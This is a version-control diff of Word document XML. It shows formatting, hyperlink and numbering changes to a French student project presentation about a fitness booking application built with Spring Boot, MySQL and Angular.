-            <w:rStyle w:val="Lienhypertexte"/>
-          </w:rPr>
-          <w:t>/</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Lienhypertexte"/>
-          </w:rPr>
-          <w:t>guide/http</w:t>
+          <w:t>https://angular.io/guide/http</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -3420,7 +3955,7 @@
         <w:autoSpaceDN w:val="0"/>
         <w:spacing w:line="256" w:lineRule="auto"/>
       </w:pPr>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3429,7 +3964,16 @@
         </w:r>
       </w:hyperlink>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>https://learning.getpostman.com/docs/postman/scripts/test_examples/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
@@ -3999,7 +4543,7 @@
       <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="643" w:hanging="360"/>
+        <w:ind w:left="785" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -4133,7 +4677,7 @@
       <w:lvlText w:val="%1.%2"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1069" w:hanging="360"/>
+        <w:ind w:left="1211" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -5023,6 +5567,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="63F90FE1"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="AFEC5F32"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="67922A2D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="65B08584"/>
@@ -5135,7 +5828,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6DEA7F5F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="526C5DD8"/>
@@ -5221,7 +5914,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="701A63BB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="75A83216"/>
@@ -5335,7 +6028,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="2">
     <w:abstractNumId w:val="4"/>
@@ -5371,19 +6064,22 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="16">
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="17">
     <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="18">
+    <w:abstractNumId w:val="14"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5500,7 +6196,7 @@
     <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -5903,6 +6599,7 @@
   <w:style w:type="paragraph" w:styleId="NormalWeb">
     <w:name w:val="Normal (Web)"/>
     <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
     <w:rsid w:val="00975FAC"/>
     <w:pPr>
       <w:suppressAutoHyphens/>
@@ -6303,7 +7000,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8703A8E4-8506-4FCB-9695-56AA00A0ADEE}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0037EDBA-3643-456E-A6D5-89E69C380B17}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/docs/oral/presOralFitnessContent.docx
+++ b/docs/oral/presOralFitnessContent.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -88,7 +88,6 @@
         <w:spacing w:line="256" w:lineRule="auto"/>
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>La th</w:t>
       </w:r>
@@ -96,11 +95,7 @@
         <w:t>èm</w:t>
       </w:r>
       <w:r>
-        <w:t>e</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> du projet</w:t>
+        <w:t>e du projet</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -876,16 +871,7 @@
         <w:textAlignment w:val="baseline"/>
       </w:pPr>
       <w:r>
-        <w:t>Chaque séance est une séquence de réservation</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> d’équipements </w:t>
-      </w:r>
-      <w:r>
-        <w:t>d’une durée de 10’.</w:t>
+        <w:t>Chaque séance est une séquence de réservations d’équipements d’une durée de 10’.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1134,13 +1120,7 @@
         <w:t>modéliser l’application et à produire ce que l’on appelle un Modèle Logique de données.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Un </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Modèle Logique de données</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> permet de représenter </w:t>
+        <w:t xml:space="preserve"> Un Modèle Logique de données permet de représenter </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">sous forme de tables SQL </w:t>
@@ -1154,18 +1134,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>entité</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>) : correspond à la notion</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> de concept comme la catégorie d’un événement</w:t>
+        <w:t>(entité) : correspond à la notion de concept comme la catégorie d’un événement</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1288,159 +1257,117 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Spring Boot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(Backend)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> adossé</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>à une base de données</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> relationnelle</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> et déléguant l’affichage des pages </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">html à </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>Spring</w:t>
+        <w:t>Angular</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Boot</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> (Frontend)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Une base de données a pour rôle</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> de stocker les données dans des tables. Le fait que ce soit une base relationnelle permet de récupérer en une seule requête des informations en provenance de différentes tables.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Spring Boot est un </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Backend</w:t>
+        <w:t>framework</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>faisant tourner</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sur un serveur web</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tomcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>un projet Spr</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ing. Un projet String étant la structure (boite à outils, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) hébergeant l’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>application JEE (Java Edition Entreprise</w:t>
+      </w:r>
+      <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> adossé</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>à une base de données</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> relationnelle</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> et déléguant l’affichage des pages </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">html à </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Angular</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Frontend</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Une base de données a pour rôle</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> de stocker les données dans des tables. Le fait que ce soit une base relationnelle permet de récupérer en une seule requête des informations en provenance de différentes tables.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Spring</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Boot est un </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>framework</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>faisant tourner</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> sur un serveur web</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tomcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">un projet </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Spr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Un projet String étant la structure (boite à outils, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>framework</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) hébergeant l’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>application JEE (Java Edition Entreprise</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> du </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>backend</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> du backend</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">.  </w:t>
       </w:r>
@@ -1529,21 +1456,32 @@
           <w:szCs w:val="16"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">Programmation orientée </w:t>
-      </w:r>
-      <w:r>
+        <w:t>Programmation orientée objet,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t>objet</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t>,</w:t>
+        <w:t>•</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>L’organisation du code source selon le Modèle MVC,</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1574,75 +1512,21 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">L’organisation du code source selon le </w:t>
+        <w:t>L’utilisation d’o</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t>Modèle MVC,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
+        <w:t>utils pour l</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>•</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>L’utilisation d’o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>utils pour l</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>es ORM (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t>Hibernate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve">es ORM (Hibernate, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1716,15 +1600,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Un projet </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Spring</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> est structuré selon l’approche</w:t>
+        <w:t>Un projet Spring est structuré selon l’approche</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2095,7 +1971,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="728F2026" wp14:editId="77D15706">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FC60BE2" wp14:editId="4BC2D2E3">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>2447925</wp:posOffset>
@@ -2163,7 +2039,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype w14:anchorId="728F2026" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+              <v:shapetype w14:anchorId="5FC60BE2" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                 <v:stroke joinstyle="miter"/>
                 <v:path gradientshapeok="t" o:connecttype="rect"/>
               </v:shapetype>
@@ -2194,7 +2070,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C213CFD" wp14:editId="722D6650">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>3348355</wp:posOffset>
@@ -2261,7 +2137,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
